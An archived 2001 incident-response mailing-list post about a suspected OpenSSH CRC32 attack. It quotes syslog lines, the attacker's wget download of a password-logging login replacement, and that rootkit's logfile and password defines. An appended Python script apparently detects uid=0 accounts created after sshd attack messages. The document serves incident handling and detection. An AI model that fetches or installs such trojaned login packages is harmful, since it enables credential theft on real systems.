I stumbled over this post at the openssh-unix-dev mailing list last week:
http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=100701808712180&w=2

The poster claims that he had OpenSSH-2.9p2-8.7 (latest update for Red Hat 7.0) up and running when he received what looks to be a CRC32 attack. A few minutes later you can see (he posted parts of the logfile) a new user being created with uid=0 and then how a connection is made from a system in Israel. There has been no confirmation about what he writes, but I received the following mail as an answer to my questions.

------ Message ------

I posted an openssh security alert earlier today and already got some responses. Thanks for everything. Instead of replying to everyone individually I composed the details of the attack.

+++

It does not look like the job of worms. Snort did not detect a mass port scan from the attacker's IP address. It seems that he (I assumed, so I don't have to type he/she all the way) just wants to gain access through openssh.

The server is running Red Hat 7.0, with all packages up to date. The following daemons are running: wu-ftpd, apache, telnet, openssh, named. I never access the system via telnet; it is there just for backup purposes.

> > Nov 25 11:37:40 ns sshd[10994]: Disconnecting: crc32 compensation attack:
> > network attack detected
> > Nov 25 11:37:48 ns sshd[11006]: Disconnecting: Corrupted check bytes on
> > input.
> > Nov 25 11:37:53 ns sshd[11013]: Disconnecting: Corrupted check bytes on
> > input.
> > Nov 25 11:37:54 ns sshd[11014]: Disconnecting: Corrupted check bytes on
> > input.
> > Nov 25 11:40:00 ns CROND[11022]: (root) CMD ( /sbin/rmmod -as)
> > Nov 25 11:40:08 ns adduser[11023]: new group: name=mattanl, gid=528
> > Nov 25 11:40:08 ns adduser[11023]: new user: name=mattanl, uid=528, gid=528,
> > home=/home/mattanl, shell=/bin/bash
> > Nov 25 11:40:27 ns adduser[11027]: new group: name=mattan, gid=529
> > Nov 25 11:40:27 ns adduser[11027]: new user: name=mattan, uid=0, gid=529,
> > home=/home/mattan, shell=/bin/bash

After the attacker gained root access, he created two users, mattan and mattanl. He then downloaded a package: wget http://home.dal.net/resolve/login.tgz. The target site has been compromised (hacked by a hacker group in Israel). This is a login replacement package; it logs the user ids and passwords. He modified rk.h to:

#define MY_LOGFILE "/dev/ttypz"
#define MY_PASSWORD "1245890"

After he compiled and installed the login replacement, something went wrong: /bin/login was zero bytes in length. So when he came back using telnet, he was denied access. I also disabled sshd and kept one session open for remote control after I found login was replaced. I md5-checked the system against a good backup; nothing else was altered.

I will try to sniff all packets that come to this server on the ssh port. If he attempts to crack the server again, I will have more details. But I guess I will have to turn the server back on.

Thanks for all your time

------ End of message ------

I had some further questions, so I mailed the guy once again but have not received any answer.

So, to the main question. Has anyone else had a system compromised by the CRC32 attack when running a version of sshd that is believed to be secure? OpenSSH-2.3.0 or later, SSH 1.2.32 or later.
/Johan Augustsson

--------------------------------------------------------------------
Johan Augustsson            Phone:  +46 (0)31 773 1000
Incident Response Team      Fax:    +46 (0)31 773 1087
Göteborg University         E-mail: Johan.Augustssonat_private
Sweden
--------------------------------------------------------------------

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
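Added illustration, not part of the original post or the poster's setup: a small Python log check that runs over a constructed syslog sample modelled on the excerpt quoted above. It flags sshd CRC32-compensation and corrupted-check-bytes disconnects, then raises an alert for any adduser event that creates a uid=0 account or that lands within a short window after those disconnects. The log year, the 10-minute window and the alert tuple layout are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample modelled on the syslog excerpt in the post (not the poster's file).
SAMPLE_LOG = """\
Nov 25 11:37:40 ns sshd[10994]: Disconnecting: crc32 compensation attack: network attack detected
Nov 25 11:37:48 ns sshd[11006]: Disconnecting: Corrupted check bytes on input.
Nov 25 11:37:53 ns sshd[11013]: Disconnecting: Corrupted check bytes on input.
Nov 25 11:40:00 ns CROND[11022]: (root) CMD ( /sbin/rmmod -as)
Nov 25 11:40:08 ns adduser[11023]: new user: name=mattanl, uid=528, gid=528, home=/home/mattanl, shell=/bin/bash
Nov 25 11:40:27 ns adduser[11027]: new user: name=mattan, uid=0, gid=529, home=/home/mattan, shell=/bin/bash
"""

# Classic BSD syslog: "Mon DD HH:MM:SS host prog[pid]: message" (no year in the timestamp).
SYSLOG_RE = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d) (\S+) (\w+)\[(\d+)\]: (.*)$")
NEW_USER_RE = re.compile(r"new user: name=(\w+), uid=(\d+)")
# Messages the old sshd emitted when the CRC32 compensation check tripped.
SSHD_ATTACK_MARKERS = ("crc32 compensation attack", "Corrupted check bytes on input")


def parse(line, year=2001):
    """Parse one syslog line into a dict, or return None if it does not match."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")  # year assumed
    return {"ts": ts, "host": m.group(2), "prog": m.group(3), "msg": m.group(5)}


def find_alerts(log_text, window=timedelta(minutes=10)):
    """Return (kind, username, timestamp, follows_sshd_attack) tuples for suspicious adduser events."""
    events = [e for e in (parse(l) for l in log_text.splitlines()) if e]
    attack_times = [e["ts"] for e in events
                    if e["prog"] == "sshd" and any(k in e["msg"] for k in SSHD_ATTACK_MARKERS)]
    alerts = []
    for e in events:
        if e["prog"] != "adduser":
            continue
        m = NEW_USER_RE.search(e["msg"])
        if not m:
            continue
        name, uid = m.group(1), int(m.group(2))
        recent = any(t <= e["ts"] <= t + window for t in attack_times)
        if uid == 0 and name != "root":
            alerts.append(("uid0_account", name, e["ts"], recent))  # second root account is always worth an alert
        elif recent:
            alerts.append(("account_after_sshd_attack", name, e["ts"], True))
    return alerts


if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_LOG):
        print(alert)
```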
This archive was generated by hypermail 2b30 : Mon Dec 03 2001 - 10:35:14 PST